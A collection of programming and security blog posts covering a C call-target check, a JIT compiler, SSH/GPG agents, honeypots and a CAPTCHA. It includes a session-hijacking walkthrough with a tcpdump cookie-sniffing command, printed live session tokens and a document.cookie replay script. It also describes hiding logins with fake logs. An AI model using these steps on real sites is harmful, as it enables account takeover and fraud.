Update: Ted Unangst pointed out OpenBSD performing a similar check in its mbuf library. Instead of a bitmap, the function pointer is replaced with an index into an array of registered function pointers. That approach is cleaner, more efficient, completely portable, and has no false positives.
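Here's a minimal sketch of that index-based idea applied to the greeter example. To be clear, this is not OpenBSD's code: the table, its size, and the greet_register() and greet_lookup() names are all my own inventions for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

struct greeter {
    char name[8];
    size_t greet;   /* index into greet_table, not a pointer */
};

typedef void (*greet_fn)(struct greeter *);

#define GREET_MAX 8
static greet_fn greet_table[GREET_MAX];
static size_t greet_count;

void
greet_hello(struct greeter *g)
{
    printf("Hello, %s.\n", g->name);
}

void
greet_aloha(struct greeter *g)
{
    printf("Aloha, %s.\n", g->name);
}

/* Register a legitimate call target. Returns its index, or -1 if the
 * table is full. */
int
greet_register(greet_fn f)
{
    if (greet_count == GREET_MAX)
        return -1;
    greet_table[greet_count] = f;
    return (int)greet_count++;
}

/* Translate an index back into a function pointer, aborting on any
 * index that was never handed out. */
greet_fn
greet_lookup(size_t index)
{
    if (index >= greet_count)
        abort();
    return greet_table[index];
}
```

The indirect call becomes greet_lookup(greeter.greet)(&greeter). An overflow can still overwrite the index, but the worst it can do is select a different registered function or trip the abort().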

Stealing Session Cookies with Tcpdump

2016-06-23T21:55:24Z

My wife was shopping online for running shoes when she got this classic Firefox pop-up.

These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.

The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.

Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer gets this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.

I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.

Finding the session cookies

To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.

The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.

tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
    grep "^Cookie: "

This command tells tcpdump to dump selected packet content as ASCII (-A). It also sets output to line-buffered so that I can see packets as soon as they arrive (-l). The filter will only match packets going out to this website and only on port 80 (HTTP), so I won’t see any extraneous noise (dst and dst port). Finally, I crudely run that all through grep to see if any cookies fall out.

On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:

Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
  urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
  78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
  up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
  -bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
  52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4

That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.

document.cookie = "JSESSIONID=99004F61A4ED162641DC36046A" +
                  "C81EAB.prd_rrs12";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
                  "1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";

Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can check out and complete the order. My browser is as genuine as hers.

How to fix it

The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents JavaScript from accessing them, since an active attacker could inject their own JavaScript into the page. The downside is that customers would appear to be logged out on plain HTTP pages, which is confusing.

However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.
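The cookie flags mentioned above amount to two extra attributes on each Set-Cookie response header. As a rough illustration, here's a hypothetical helper (set_cookie_header() is my own name, and it does no escaping or validation of the name and value) that formats such a header.

```c
#include <stddef.h>
#include <stdio.h>

/* Format a Set-Cookie header carrying the Secure and HttpOnly
 * attributes. Returns the snprintf() result: the length the full
 * header needs, not counting the terminating null byte. */
int
set_cookie_header(char *out, size_t len,
                  const char *name, const char *value)
{
    return snprintf(out, len, "Set-Cookie: %s=%s; Secure; HttpOnly",
                    name, value);
}
```

With the name JSESSIONID and the value abc123, this produces "Set-Cookie: JSESSIONID=abc123; Secure; HttpOnly".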

A Basic Just-In-Time Compiler

2015-03-19T04:57:55Z

This article was discussed on Hacker News and on reddit.

Monday’s /r/dailyprogrammer challenge was to write a program to read a recurrence relation definition and, through interpretation, iterate it to some number of terms. It’s given an initial term (u(0)) and a sequence of operations, f, to apply to the previous term (u(n + 1) = f(u(n))) to compute the next term. Since it’s an easy challenge, the operations are limited to addition, subtraction, multiplication, and division, with one operand each.

For example, the relation u(n + 1) = (u(n) + 2) * 3 - 5 would be input as +2 *3 -5. If u(0) = 0 then,

u(1) = 1
u(2) = 4
u(3) = 13
u(4) = 40
u(5) = 121
…

Rather than write an interpreter to apply the sequence of operations, for my submission (mirror) I took the opportunity to write a simple x86-64 Just-In-Time (JIT) compiler. So rather than stepping through the operations one by one, my program converts the operations into native machine code and lets the hardware do the work directly. In this article I’ll go through how it works and how I did it.

Update: The follow-up challenge uses Reverse Polish notation to allow for more complicated expressions. I wrote another JIT compiler for my submission (mirror).

Allocating Executable Memory

Modern operating systems have page-granularity protections for different parts of process memory: read, write, and execute. Code can only be executed from memory with the execute bit set on its page, memory can only be changed when its write bit is set, and some pages aren’t allowed to be read. In a running process, the pages holding program code and loaded libraries will have their write bit cleared and execute bit set. Most of the other pages will have their execute bit cleared and their write bit set.

The reason for this is twofold. First, it significantly increases the security of the system. If untrusted input was read into executable memory, an attacker could input machine code (shellcode) into the buffer, then exploit a flaw in the program to cause control flow to jump to and execute that code. If the attacker is only able to write code to non-executable memory, this attack becomes a lot harder. The attacker has to rely on code already loaded into executable pages (return-oriented programming).

Second, it catches program bugs sooner and reduces their impact, so there’s less chance for a flawed program to accidentally corrupt user data. Accessing memory in an invalid way will cause a segmentation fault, usually leading to program termination. For example, NULL points to a special page with read, write, and execute disabled.

An Instruction Buffer

Memory returned by malloc() and friends will be writable and readable, but non-executable. If the JIT compiler allocates memory through malloc(), fills it with machine instructions, and jumps to it without doing any additional work, there will be a segmentation fault. So some different memory allocation calls will be made instead, with the details hidden behind an asmbuf struct.

#define PAGE_SIZE 4096

struct asmbuf {
    uint8_t code[PAGE_SIZE - sizeof(uint64_t)];
    uint64_t count;
};

To keep things simple here, I’m just assuming the page size is 4kB. In a real program, we’d use sysconf(_SC_PAGESIZE) to discover the page size at run time. On x86-64, pages may be 4kB, 2MB, or 1GB, but this program will work correctly as-is regardless.
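For reference, the run-time query is a one-liner on POSIX systems. The page_size() wrapper is just a name I'm using for this sketch.

```c
#include <unistd.h>

/* Query the system page size at run time. Returns -1 on failure. */
long
page_size(void)
{
    return sysconf(_SC_PAGESIZE);
}
```

A buffer sized this way couldn't use a fixed-length array in the struct as I do here. It would need something like a flexible array member, with the capacity computed from the result.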

Instead of malloc(), the compiler allocates memory as an anonymous memory map (mmap()). It’s anonymous because it’s not backed by a file.

struct asmbuf *
asmbuf_create(void)
{
    int prot = PROT_READ | PROT_WRITE;
    int flags = MAP_ANONYMOUS | MAP_PRIVATE;
    return mmap(NULL, PAGE_SIZE, prot, flags, -1, 0);
}

Windows doesn’t have POSIX mmap(), so on that platform we use VirtualAlloc() instead. Here’s the equivalent in Win32.

struct asmbuf *
asmbuf_create(void)
{
    DWORD type = MEM_RESERVE | MEM_COMMIT;
    return VirtualAlloc(NULL, PAGE_SIZE, type, PAGE_READWRITE);
}

Anyone reading closely should notice that I haven’t actually requested that the memory be executable, which is, like, the whole point of all this! This was intentional. Some operating systems employ a security feature called W^X: “write xor execute.” That is, memory is either writable or executable, but never both at the same time. This makes the shellcode attack I described before even harder. For well-behaved JIT compilers it means memory protections need to be adjusted after code generation and before execution.

The POSIX mprotect() function is used to change memory protections.

void
asmbuf_finalize(struct asmbuf *buf)
{
    mprotect(buf, sizeof(*buf), PROT_READ | PROT_EXEC);
}

Or on Win32 (that last parameter is not allowed to be NULL),

void
asmbuf_finalize(struct asmbuf *buf)
{
    DWORD old;
    VirtualProtect(buf, sizeof(*buf), PAGE_EXECUTE_READ, &old);
}

Finally, instead of free() it gets unmapped.

void
asmbuf_free(struct asmbuf *buf)
{
    munmap(buf, PAGE_SIZE);
}

And on Win32,

void
asmbuf_free(struct asmbuf *buf)
{
    VirtualFree(buf, 0, MEM_RELEASE);
}

I won’t list the definitions here, but there are two “methods” for inserting instructions and immediate values into the buffer. This will be raw machine code, so the caller will be acting a bit like an assembler.

asmbuf_ins(struct asmbuf *, int size, uint64_t ins);
asmbuf_immediate(struct asmbuf *, int size, const void *value);
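For the curious, here's one plausible way these two could be written. Treat it as a sketch under my own assumptions (a void return type, no bounds checking) rather than the definitive definitions.

```c
#include <stdint.h>
#include <string.h>

#define PAGE_SIZE 4096

struct asmbuf {
    uint8_t code[PAGE_SIZE - sizeof(uint64_t)];
    uint64_t count;
};

/* Append the low `size` bytes of ins, most significant byte first, so
 * that 0x4889f8 lands in memory as 48 89 f8, matching the order the
 * disassembler prints. No bounds check. */
void
asmbuf_ins(struct asmbuf *buf, int size, uint64_t ins)
{
    for (int i = size - 1; i >= 0; i--)
        buf->code[buf->count++] = (ins >> (i * 8)) & 0xff;
}

/* Append `size` raw bytes from value in host byte order, which is
 * little endian on x86-64, exactly what an immediate operand needs.
 * No bounds check. */
void
asmbuf_immediate(struct asmbuf *buf, int size, const void *value)
{
    memcpy(buf->code + buf->count, value, size);
    buf->count += size;
}
```

The two functions differ only in byte order: instructions are written the way they read in a disassembly listing, while immediates are copied straight out of memory.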

Calling Conventions

We’re only going to be concerned with three of x86-64’s many registers: rdi, rax, and rdx. These are 64-bit (r) extensions of the original 16-bit 8086 registers. The sequence of operations will be compiled into a function that we’ll be able to call from C like a normal function. Here’s what its prototype will look like. It takes a signed 64-bit integer and returns a signed 64-bit integer.

long recurrence(long);

The System V AMD64 ABI calling convention says that the first integer/pointer function argument is passed in the rdi register. When our JIT compiled program gets control, that’s where its input will be waiting. According to the ABI, the C program will be expecting the result to be in rax when control is returned. If our recurrence relation is merely the identity function (it has no operations), the only thing it will do is copy rdi to rax.

mov   rax, rdi

There’s a catch, though. You might think all the mucky platform-dependent stuff was encapsulated in asmbuf. Not quite. As usual, Windows is the oddball and has its own unique calling convention. For our purposes here, the only difference is that the first argument comes in rcx rather than rdi. Fortunately this only affects the very first instruction and the rest of the assembly remains the same.

The very last thing it will do, assuming the result is in rax, is return to the caller.

ret

So we know the assembly, but what do we pass to asmbuf_ins()? This is where we get our hands dirty.

Finding the Code

If you want to do this the Right Way, you go download the x86-64 documentation, look up the instructions we’re using, and manually work out the bytes we need and how the operands fit into it. You know, like they used to do out of necessity back in the 60’s.

Fortunately there’s a much easier way. We’ll have an actual assembler do it and just copy what it does. Put both of the instructions above in a file peek.s and hand it to nasm. It will produce a raw binary with the machine code, which we’ll disassemble with ndisasm (the NASM disassembler).

$ nasm peek.s
$ ndisasm -b64 peek
00000000  4889F8            mov rax,rdi
00000003  C3                ret

That’s straightforward. The first instruction is 3 bytes and the return is 1 byte.

asmbuf_ins(buf, 3, 0x4889f8);  // mov   rax, rdi
// ... generate code ...
asmbuf_ins(buf, 1, 0xc3);      // ret

For each operation, we’ll set it up so the operand will already be loaded into rdi regardless of the operator, similar to how the argument was passed in the first place. A smarter compiler would embed the immediate in the operator’s instruction if it’s small (32 bits or fewer), but I’m keeping it simple. To sneakily capture the “template” for this instruction I’m going to use 0x0123456789abcdef as the operand.

mov   rdi, 0x0123456789abcdef

Which disassembled with ndisasm is,

00000000  48BFEFCDAB896745  mov rdi,0x123456789abcdef
         -2301

Notice the operand listed little endian immediately after the instruction. That’s also easy!

long operand;
scanf("%ld", &operand);
asmbuf_ins(buf, 2, 0x48bf);         // mov   rdi, operand
asmbuf_immediate(buf, 8, &operand);

Apply the same discovery process individually for each operator you want to support, accumulating the result in rax for each.

switch (operator) {
    case '+':
        asmbuf_ins(buf, 3, 0x4801f8);   // add   rax, rdi
        break;
    case '-':
        asmbuf_ins(buf, 3, 0x4829f8);   // sub   rax, rdi
        break;
    case '*':
        asmbuf_ins(buf, 4, 0x480fafc7); // imul  rax, rdi
        break;
    case '/':
        asmbuf_ins(buf, 2, 0x4899);     // cqo   (sign-extend rax into rdx)
        asmbuf_ins(buf, 3, 0x48f7ff);   // idiv  rdi
        break;
}

As an exercise, try adding support for the modulus operator (%), XOR (^), and bit shifts (<, >). With the addition of these operators, you could define a decent PRNG as a recurrence relation. It will also eliminate the closed form solution to this problem so that we actually have a reason to do all this! Or, alternatively, switch it all to floating point.

Calling the Generated Code

Once we’re all done generating code, finalize the buffer to make it executable, cast it to a function pointer, and call it. (I cast it as a void * just to avoid repeating myself, since that will implicitly cast to the correct function pointer prototype.)

asmbuf_finalize(buf);
long (*recurrence)(long) = (void *)buf->code;
// ...
x[n + 1] = recurrence(x[n]);

That’s pretty cool if you ask me! Now this was an extremely simplified situation. There’s no branching, no intermediate values, no function calls, and I didn’t even touch the stack (push, pop). The recurrence relation definition in this challenge is practically an assembly language itself, so after the initial setup it’s a 1:1 translation.

I’d like to build a JIT compiler more advanced than this in the future. I just need to find a suitable problem that’s more complicated than this one, warrants having a JIT compiler, but is still simple enough that I could, on some level, justify not using LLVM.

SSH and GPG Agents

2012-06-08T00:00:00Z

If you’re using SSH or GPG with any sort of frequency, you should definitely be using their accompanying *-agent programs. The agents allow you to gain a whole lot of convenience without compromising your security. Many people seem to be unaware these tools exist, so here’s an overview along with some tips on how to use them effectively.

Let’s start from the top.

Both SSH and GPG involve the use of asymmetric encryption, and the private key is protected by a user-entered passphrase. The private key is generally never written to the filesystem in plaintext. In the case of GPG, these keys are the primary focus of the application. For SSH, they’re a useful tool to make accessing remote machines less tedious. (The SSH server is authenticated by a public key, too, but this is unrelated to agents.)

For those who are unaware, rather than enter a password when logging into a remote machine, you can identify yourself by a public key. Generating a key is simple.

ssh-keygen

You’ll almost certainly want to accept the default location for the key (~/.ssh/id_rsa) because this is where SSH will look for it. Make sure you enter a passphrase, which will encrypt the private key. The reason this is important is because, without it, anyone who gains access to your id_rsa file will be able to access any remote systems that have been told to trust your public key. By having a passphrase, this person needs not only the id_rsa file, but also the passphrase (two-factor authentication), so you probably want to pick a long, strong one. This may sound inconvenient, but ssh-agent will help you.

The key generation process will create two files: id_rsa (private key) and id_rsa.pub (public key). The latter is what you give to remote systems.

Telling a remote system about your key is simple,

ssh-copy-id

This will copy your id_rsa.pub to the remote system, prompting you for the password on the remote system (not the passphrase you just entered), adding it to the file ~/.ssh/authorized_keys. From this point on, all logins will use your new keypair rather than prompt you for a password. Since you put a passphrase on your key, this may seem pointless — it seems you still need to type in a password for every connection. Bear with me here!

As a side note, you should have a unique SSH keypair for each site, so you’ll have several of them. This way you can revoke access to a particular site without affecting the others.

For GPG — the GNU Privacy Guard, the free software PGP implementation — your keys are stored under ~/.gnupg/ in a database. Generating a key is also a simple command,

gpg --gen-key

This is a slightly more complicated process, which I won’t get into here. In contrast to SSH, you’ll generally have only one keypair per identity (i.e. you only have one).

So you’ve got these keys encrypted by passphrases. If they’re going to be any use then they’ll be long, annoying things that are a pain to type in. If that was the end of the story this would be really inconvenient, enough to make the use of passphrases too costly for many people to bother. Fortunately, we have agents to help.

An agent is a daemon process that can hold onto your passphrase (gpg-agent) or your private key (ssh-agent) so that you only need to enter your passphrase once within some period of time (possibly for the entire life of the agent process), rather than type it over and over again as it’s needed. The agents are very careful about how they hold on to this sensitive information, such as avoiding having it written to swap. You can also configure how long you want them to hold onto your passphrase/key before purging it from memory.

The ssh and gpg programs need to know where to find the agents. This is done through environment variables. For ssh-agent, the process ID is stored in SSH_AGENT_PID and the location of the Unix socket for communication is in SSH_AUTH_SOCK. gpg-agent stuffs everything into one variable, GPG_AGENT_INFO (which is a pain if you want to use this information in a script). When the main program is invoked and it needs to use the private key, it will use these variables and get in touch with the agent to see if it can supply the needed information without bothering the user.

Remember, a process can’t change the environment of its parent process, so you need to set this information in the agent’s parent shell somehow. There are two methods to set these up: eval and exec.

When you start the agent, it forks off its daemon process and prints the variable information to stdout. This can be evaled directly into the current environment. You could drop these lines directly in your .bashrc so that the agents are always there. (Though they won’t exit with your shell, lingering around uselessly! More on this ahead.)

eval $(ssh-agent)
eval $(gpg-agent --daemon)

For the exec method, you replace your current shell with a new one with a modified environment. To do this, you ask the agent to exec into a shell, with the variables set, rather than return control.

exec ssh-agent bash
exec gpg-agent --daemon bash

As a cool trick, you can chain these together. ssh-agent becomes gpg-agent which then becomes bash.

exec ssh-agent gpg-agent --daemon bash

Note that gpg-agent is capable of being an ssh-agent as well by using the --enable-ssh-support option, so you don’t need to launch an ssh-agent. Unfortunately, I don’t like to use this because gpg-agent gets a little too personal with the SSH key, storing its own copy with its own passphrase again.

On the other hand, gpg-agent is much more advanced than OpenSSH’s ssh-agent. When you want to have ssh-agent manage a key, you need to first tell it about the key with ssh-add. With no arguments, it will use ~/.ssh/id_rsa. If you forget to do this, ssh will ask for your passphrase directly, in your terminal, not allowing ssh-agent to hold onto it. By comparison, gpg will always ask gpg-agent to retrieve your passphrase when it’s needed (if the agent is available), so it will cache your passphrase on demand. No need to explicitly register with the agent. Even better, it will try its best to use a “PIN entry” program to read your passphrase, which helps protect against some kinds of keyloggers by preventing other processes from seeing your keystrokes.

Well, this is all fine and dandy except when you’ve already got an agent running. Say you’re launching a new terminal emulator window from an existing one, creating a new shell. Unfortunately, even though you have agents running and they’re listed in your environment (from the origin shell), they’ll still spawn new agents! This is really lousy behavior, in my opinion. There’s no --inherit option to tell them to silently pass along the information of the existing agent if it appears to be valid. This causes two problems. First, you’ll need to enter your passphrases again for the new agent. Second, these new agents will linger around after the spawning shell has exited, hogging important non-swappable memory.

The direct workaround is to, in your shell init script, check for these variables yourself and check that they’re valid (the agent process is still running) before trying to spawn any agents. This is tedious, error-prone, and makes each user do a lot of work that could have been done in one place by one person instead.

There’s still the problem of when you launch a new shell that doesn’t inherit the variables (e.g. a remote login), so there’s no way for it to be aware of the existing agents. To fix this, you’d need to write the agent information to a file. The shell init script checks this file for an existing agent before spawning one. This is even more complicated, more error-prone, and subject to race conditions. Why make every user go through this process?!

Fortunately someone’s done all this work so you don’t have to! There’s an awesome little tool called Keychain which can be used to launch the agents for you. It stores the agent information in a file so that you only ever launch one instance of the agent, and the agents will be shared across every shell. It does have an --inherit option — the default behavior, so you don’t even need to ask nicely. Instead of running the *-agents directly, you just put this in your .bashrc,

eval $(keychain --eval --quiet)

So simple and it just works! I was so happy when I found this. This is the magic word that makes using agents a breeze, so I can’t recommend it enough.

SSH Honeypots

2012-05-19T00:00:00Z

Three years ago I was experimenting with high-interaction SSH honeypots. I failed to document the effort as a blog post afterwards. Fortunately, I’ve been experimenting with honeypots again, so I’m taking the time to document it this time.

A honeypot is a fake service or computer on a network used in detecting and deflecting attacks on the network. Ideally, an attacker is unable to tell honeypots apart from real systems, attacking the honeypots instead. In general, honeypots fall into two categories: high-interaction and low-interaction. The former will imitate a real system with high fidelity while the latter may just listen for connections on common ports, without actually accepting or sending data.

What triggered my curiosity was that I wanted to put OpenBSD’s securelevel(7) feature to the test. In short, it’s a runtime system value that ranges from -1 (least secure) to 2 (most secure), and it’s not possible to decrease the level without gaining physical access to the system. Each increase makes the system more read-only, and less flexible, so it’s a trade-off. A system running at level 2 should not carry over any state between boots — like a LiveCD on a system with no disks.

I set up a fresh OpenBSD install in a QEMU virtual machine, locked the system down with securelevel at 1, forwarded the SSH port all the way out to the Internet, and then gave Gavin the root password. I told him to go nuts, with the ultimate goal that when he was done I should be unable to tell he had even logged into the system. All of the system logs were set to append-only, enforced through the kernel by securelevel, so this should have been a very difficult task indeed.

It turned out he was much more successful than I expected. When he told me he was done, I SSHed into the system to check the logs and found no entries indicating he had logged in at all. The only proof I could find that he was actually in was a message he intentionally left behind for me. Did he just subvert securelevel?!

Turns out not quite. Whew! I was just putting too much trust into a system I knew was compromised. He mounted a loopback filesystem on top of /var/log, then filled it with fake logs. He also sabotaged the mount programs so that they’d hide the loopback mount from me. Since the mount programs were on a read-only system, he had to do a loopback mount there, too. After restarting OpenSSH, it was no longer writing to the append-only log, but to the doctored log.

So, the proper way to check your security logs is by mounting the compromised filesystem in a known trusted system — or, in this case, just rebooting would have fixed it. Even with securelevel, you can’t check the compromised system in-place. Let this be a lesson to all those amateur sysadmins out there (including me)!

We did a second round and he managed to trick me again by taking me further into the rabbit hole. Instead of loopback mounts, since I was expecting that, he had root log into a chroot environment, filled with a full copy of the system including fake logs. This version survived reboots and really required inspection from an external system.

After all this, I wanted to crank things up a notch by letting some real attackers into my test system. I was already accustomed to seeing many password-guesses on my SSH server in the logs, so getting someone into my honeypot wouldn’t take long at all. While I didn’t care if they trashed my VM (restoring from snapshot was an automatic process), I really didn’t want them to take advantage of my Internet connection, using it for DDoS attacks or pivoting to attack other SSH servers. So I needed a way to allow them in through SSH, but not allow any other traffic out.

If I were doing this today, I’d probably use iptables to only allow SSH in, and then bridge the VM to the Internet with a TUN/TAP, replacing my real SSH server on port 22. However, three years ago I didn’t know how to do this. Instead I found a really simple hack to get this done: tsocks. tsocks adds SOCKS proxying to any application by replacing the sockets API with its own. In my case, I wrapped the VM in tsocks configured to use a non-existent SOCKS proxy (127.0.0.1). The VM could accept any incoming connection (though limited to SSH because of NAT) but was unable to make any outgoing connections. Perfect!

I hadn’t realized it yet, but I had created a high-interaction SSH honeypot.

I set the root password to “password” and let it go for a while, tailing the OpenSSH logs to watch for activity. The brute-force bots would eventually make their way inside but immediately log out and keep guessing passwords for root. Either they were really poorly programmed or they were specifically testing for honeypots that allow different passwords. They must have logged the address for a human to investigate some time in the future, because I never witnessed any shell activity. On the other hand, this was all very difficult to observe, for the same reasons Gavin was able to cover his tracks. My honeypot was useful for catching and detecting attackers, but it wasn’t good for observing them in action.

While I was investigating this I came across Kojoney, which is a low-interaction SSH honeypot mainly for seeing what sorts of passwords attackers were guessing. Unfortunately, I could never get it to work, so I never used it.

Several years passed and I recently came across a project that didn’t exist last time: kippo, a “medium”-interaction SSH honeypot. This is everything I was looking for before. It doesn’t require a full-blown VM, it has high-fidelity interaction, it’s safe, and it allows me to fully observe all activity. It even records the tty session for replay. Cool!

kippo is written in pure Python, so there shouldn’t be any buffer overflows, and it doesn’t execute any external programs. It should be safe, but I’m not aware of any real security reviews, so it’s a use-at-your-own-risk thing. They warn about this on their website.

I’ve run this off and on on the weekends. Since I haven’t run my real SSH server on port 22 since 2009 (no recorded attacks since!), my IP address attracts much less attention than before, so it hasn’t seen too much activity. I have had two humans connect and log in. Both downloaded a well-known script kiddie tool called go.sh. Here’s an analysis of the tool by someone who was actually attacked with it: SSH Bruteforce.

In fact, go.sh is so well known that it gave me a little scare. In my tty recording it looked like the tool was actually executed! The skull banner printed out and it had an interface. I was really nervous until I found kippo’s malware.py. Kippo actually recognizes some script kiddie tools and imitates their interfaces to further confuse attackers. I do run kippo as an unprivileged user so it wouldn’t be the end of the world if something did happen, but I’d still be uncomfortable.

There’s a neat feature of kippo, which hilariously caught Gavin off-guard when I had him poke at it. kippo will never disconnect a session on its own. If an exit or C-d is given, it drops into another fake shell with the hostname “localhost”, merely pretending to log out. That way you get a chance to see some commands the attackers are meaning to run on their own system, before they realize their mistake. The only way to disconnect is to either close your terminal emulator or use SSH’s ~. escape sequence.

I’ve been considering running kippo all the time with no password set — using it as a true honeypot. This would help keep anyone from finding my real SSH server, since they would find the honeypot and stop searching other ports. It would also waste time that could be spent attacking other people’s real SSH servers, helping to protect other servers out there. My real SSH server (on my router) doesn’t allow password logins, only key logins, so I already feel pretty good about its security. I’ve never seen a brute-force attempt on the current port anyway. But if I do, I now have kippo as another tool in my security toolbelt.

I Finally Have Comments

2009-05-12T00:00:00Z

Update: This post is referring to my old web hosting situation. I'm now using external comment hosting because my blog is now statically hosted.

I finally have a comment system, thanks to pollxn, a blosxom comment system that actually works. There is a link to it, indicating the number of comments, at the bottom of each post. Try it out and say hello.

Unfortunately, pollxn doesn't have any sort of anti-spam or CAPTCHA system. If you look around the Interwebs where other people are using pollxn, you will see everyone has their own little CAPTCHA thing. Well, I am no different. I hacked together my own to keep away automated spammers.

It selects words from the dictionary (of 40,000 words in this case) and encrypts them with Blowfish in CBC mode, with a unique IV each time. This is passed to the user, who passes it to an image generator which decrypts the word and uses GD in Perl to render it, apply some transforms, and drop a line randomly over it. The user submits the guess of the image along with the encrypted version (hidden field), which is decrypted and compared on the other end. The same encrypted ID cannot be used twice, but thanks to the IV the same word can be used twice.

Here are some samples. If you hit refresh, they will render differently. (Update: not any more. These are just static examples now.)

It's not a great CAPTCHA, but it should be good enough for the low volume of traffic I see here. As I inevitably collect small amounts of spam (by spammers manually passing the CAPTCHA), I will gradually create the needed tools to combat it. I can also easily update the CAPTCHA image algorithm without disrupting the functioning of the website.

I'm sure I will be making improvements to the comment system over time as well. I should make it obfuscate e-mail addresses, for one. Maybe add a preview. And better blosxom integration.

So say hello below! I am excited to finally have a real blog.

Controlling a Minefield

2008-12-16T00:00:00Z

Some time ago I was watching through the entire series of Deep Space 9. It was a Star Trek television show about a space station that rests next to a wormhole that connects to the other side of the galaxy (the Gamma quadrant).

The Gamma quadrant is ruled by a group called the Dominion, and they are looking to conquer the Federation side of the galaxy (the Alpha quadrant). At one point during the series, the Federation needs to temporarily disable the wormhole to prevent Dominion ships from crossing through. They do this by mining the wormhole with identical, cloaked, self-replicating mines.

If a mine is destroyed, the neighboring mines will replicate a replacement. The minefield repairs itself. This makes removing the minefield within a reasonable amount of time difficult to impossible. If even a single mine is left behind, it can replicate the entire minefield again.

The most interesting question here is this:

When the Federation returns and wants to remove the minefield, how would they do it? What would stop the Dominion from doing the same thing?

The first thing that comes to mind is having a kill signal, but what would this signal be? It could simply be a plain "kill" command, but the Dominion could also broadcast such a signal to disable the minefield. Consider that the Dominion could capture a single mine and study everything about its workings. The minefield itself could therefore hold no secrets whatsoever. This leaves out any possibility of a secret kill command stored in the mines.

Here's what I would do, assuming that humans or aliens have not yet discovered some giant breakthrough in factoring in the Star Trek universe. I would randomly generate two very large prime numbers. Today, two 1024-bit primes should be more than enough, but in 350 years even larger numbers would probably be necessary. Then, I multiply these two numbers together and store the product in the mine software. To disable the minefield, I simply broadcast the two primes into the minefield. The mines would be programmed to take the product of any pair of numbers they receive (ignoring the trivial pair of 1 and the stored number itself). If the product matches the internal number, the mine shuts down.

Voila! A method for shutting down the minefield. The enemy can know everything about every single mine's construction, including the software and data stored on every mine, but will be unable to disable the minefield without factoring a very large composite number, which would presumably be difficult or impossible (within a reasonable amount of time).
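
As a rough sketch of that check in Python: the two Mersenne primes below are small, well-known stand-ins for large randomly generated primes, and the names STORED_PRODUCT and should_shut_down are made up for illustration. The check also rejects a factor of 1, since otherwise anyone could broadcast 1 and the stored number itself.

```python
# Illustrative stand-ins only: real primes would be random and far larger.
P = 2**31 - 1  # a Mersenne prime
Q = 2**61 - 1  # a Mersenne prime

# The only value a mine carries. Capturing a mine reveals this, not P or Q.
STORED_PRODUCT = P * Q


def should_shut_down(a: int, b: int, stored: int = STORED_PRODUCT) -> bool:
    """Return True if (a, b) is a non-trivial factorization of the stored number."""
    # Reject trivial factors such as 1 * stored, which require no secret.
    if a <= 1 or b <= 1:
        return False
    return a * b == stored
```

Broadcasting the two primes in either order shuts the mine down; any other pair is ignored.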

Another possibility would be using a hash. Come up with a strong passphrase, then use a hashing algorithm like SHA-1 or MD5, or whatever is available and appropriate in 350 years, to hash the passphrase. Store the hash in the mines. When you want to disable the minefield, broadcast the passphrase. These mines will hash the broadcast and compare it to the stored hash. It's really the same solution as before: a one-way function. This is also similar to how passwords are stored inside a computer today.
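
The hash variant might look something like this in Python. This is only a sketch: SHA-256 from the standard hashlib module is swapped in for the algorithms named above, and the function names are hypothetical.

```python
import hashlib
import hmac


def make_stored_hash(passphrase: str) -> bytes:
    """Computed once by the minefield's owner; only the result goes into the mines."""
    return hashlib.sha256(passphrase.encode("utf-8")).digest()


def is_kill_command(broadcast: str, stored_hash: bytes) -> bool:
    """Hash whatever was broadcast and compare it to the stored hash."""
    candidate = hashlib.sha256(broadcast.encode("utf-8")).digest()
    # compare_digest avoids leaking how many leading bytes matched.
    return hmac.compare_digest(candidate, stored_hash)
```

As with the primes, the mine stores only the output of the one-way function, so studying a captured mine does not reveal the passphrase.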

If we wanted more commands, like "don't blow up any ships for a while" or "increase minefield density", we could generate more composites corresponding to each command. However, once a command is issued, the secret (the two prime numbers) is out, and it cannot be used again. In this case, I would go into the realm of public key cryptography.

